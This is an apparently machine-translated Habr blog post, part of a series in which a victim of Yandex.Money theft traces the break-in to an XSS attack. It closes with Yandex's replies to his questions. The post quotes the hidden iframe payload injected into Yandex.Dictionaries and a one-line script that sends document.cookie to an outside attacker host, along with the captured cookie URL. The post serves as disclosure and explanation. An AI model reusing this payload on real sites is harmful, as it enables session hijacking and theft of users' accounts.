⬆️ ⬇️

How to take my money from the Yandex wallet. Part 3. XSS

Continuation of the detective story “How to take my money from the Yandex wallet”. Part 3. XSS

Previous parts can be found here:

Part 1

Part 2.1

Part 2.2



Attention! Part unexpected!



In this part:

  1. Freelance.ru
  2. XSS on Yandex.Dictionaries
  3. Flashback
  4. Answer from Yandex.Money
  5. Questions to Yandex


')

Attention! No PR and ANTIPR in the article is not meant!



Freelance.ru



I, like many habra users sometimes look for a job on various freelancing sites. So it was today in the morning - I got up early, there was nothing to do, so I thought to look for a job with a partner. I searched on several sites at once. I saw one of the proposals on the website freelance.ru: “Site redesign” , and the price seems to be not bad: 8000 pv. Give, I think I will open and look. Something familiar flashed through the assignment, but somehow I missed it. I began to look at the proposals for work: everyone wanted to fulfill (the people, along the way, do not read anything at all, stupidly offer their services) and only stopped a couple of comments. One of them read:

When will you die already, spammer


Then I immediately decided to return to the top and poke at the address of the site specified in the task: [Attention! Poke to the address is only if you use Firefox c NoScript ! Why? Read below and DO NOT poke a link at once, only after reading the entire article! Just in case, the link was changed at the request of fstrange and fata1ex ] _http: //tarandaz.ru. Poked. Google Chrome transferred me to a familiar site for me, but after a couple of seconds there was a redirect (I didn’t understand why he decided to do this). I saw a blank page ...



XSS on Yandex.Dictionaries



In the address bar of Google Chrome there was an interesting address:

  http://httpz.ru/nzakazchik.gif?yandexuid=2318214601243884128;%20yp=2145906000.gp.65_084965:103_682149:1 ordinary; .;% 20yandex_login = my_name;% 20L = YVdmDX9CAABmCEt8ClVwSn8DYAdBYQAGdy1mWzEVBEAiKClFBR82Pyo + ViQ5AFxTMScSIg4HLz4UJk8DAhIfGg == 1257846938.6157.282848.2cc34301b2ce0d38049606bca0c1f5fc;% 20narod_login = my_name;% 20Session_id = 1257846940.2726.0.38263038.2: 208547497: 0.62207.1514.047497eb07f8d2e7628d5a62e9bd2bd9;% 20yabs-frequency = / 2 / IE1v08459zvKUW211I6DVcm0WGL1Kjzv08458GIPUG211I7Q07e0WGKXyarw08459oT4UW211ISaq7a0WGKXmUKz0845WVzTUW211I6UZM80WGKXFSTt07W5F000 // fGA11G46 


I started looking at it and what did I see ?! All right, variables containing the words "yandex". Opana! I open Firefox with NoScript, I re-follow the original link and NoScript says: “Attention! XSS attack prevented! ” "Cool", I think. I climb into the source code of the main site, I see there is such a tag:

  <iframe src = 'http: //slovari.yandex.ru/search.xml? text = & st_translate = sp% 22 <script> alert () </ script>% 3CSCRIPT type = text / javascript src = http: // httpz .ru / zakazchikgo.js> </ SCRIPT> "'width =' 0 'height =' 0 'style =' display: none '> </ iframe> 


Well, I think a fig yourself! I'm going to the URL with the js-script: there is such code:

  location.href = "http://httpz.ru/nzakazchik.gif?"  + document.cookie; 


Everything is clear! We steal a cookie, we go on behalf of the user in his office ...



Flashback



Then I remember that before the money was stolen from me, I also ran through the freelancing site and already poked into such an ad and also followed the link ... Where my profile was hacked is now clear. How to change the password - the question is more interesting. How did you find out the payment password - even more interesting ...



Answer from Yandex.Money



As soon as I saw such a scheme, sperans unsubscribed . She told me that this vulnerability was passed on to developers, and in such a scheme it is impossible to divert the password from Yandex.Money (at the time of writing the topic, the vulnerability is still available). In principle, I tried various login options, but I could not get a payment password using this scheme ...



Questions to Yandex



  1. How did you “investigate”? Read the message and copypaste from the instructions?
  2. Why do I, the account owner, do not give any information about how to change my account password, what ip logged in, did the attackers somehow try to recover my payment password?
  3. Were there any attempts to enter an incorrect payment password?
  4. Why the payment password did not change after hacking? (Only the account password + additional e-mail has been changed ...)
  5. Why is this information “SUPER CONFIDENTIAL” (yes, caps), which is available ONLY to Yandex and police officers ?!


I understand that if you returned the money to me - I would not be particularly concerned about these questions, but in this case the answers are important to me. Just like the other users, I think ...



Answers from Yandex

1. How did you “investigate”? Read the message and copypaste from the instructions?

- Of course, not only. Checked with which ip made the payment and where the money went, and then - can I get them back. As it turns out, is it possible to return - this is confidential information. Sometimes, by the way, it is very disappointing: in ten minutes it becomes clear that the matter is 100% for the police and we can’t do anything already - and now we’re sitting and thinking, we’ll write to the user - he will decide that we didn’t do anything :( just already know the result.



2. Why don't I, the account owner, give any information about how my account password was changed, what ip came in from, did the attackers somehow try to recover my payment password?

- Because we do not send such information by e-mail. You already in the previous topics explained it to other habrovchane.



3. Were there any attempts to enter an incorrect payment password?

- It does not matter.



4. Why the payment password did not change after hacking? (Only the account password + additional e-mail has been changed ...)

- This is a common mode of action. I was not in the mind of the attacker, but I suppose that he simply did not bother. One login password has changed - and enough.



5. Why is this information “SUPERCONFIDENTIAL” (yes, caps), which is available ONLY to Yandex and police officers ?!

“I don’t even know how to explain why the information is confidential.” That is why the name of the account holder confidential information? And the amount of his last payment for MTS, why confidential information, maybe there are only 10 rubles, is also a secret to me?




If someone can help further in the unwinding (in terms of help to understand what happened after they stole the cookie) of this situation - I will be grateful!



PS From the police department have not yet called. I think I'll be ahead of them tomorrow ...



UPD. Yandex asked to convey that the payment password in case of theft a cookie is not transmitted. I want to note that I did not say that. In the topic in 2 places it says that I DO NOT know how the payment password was extracted



UPD 2. As reported from Yandex , the vulnerability was closed.



The next part of the story is here: How to take my money from the Yandex wallet. Part 4. So what's up with the statement ?!

Source: https://habr.com/ru/post/74811/



All Articles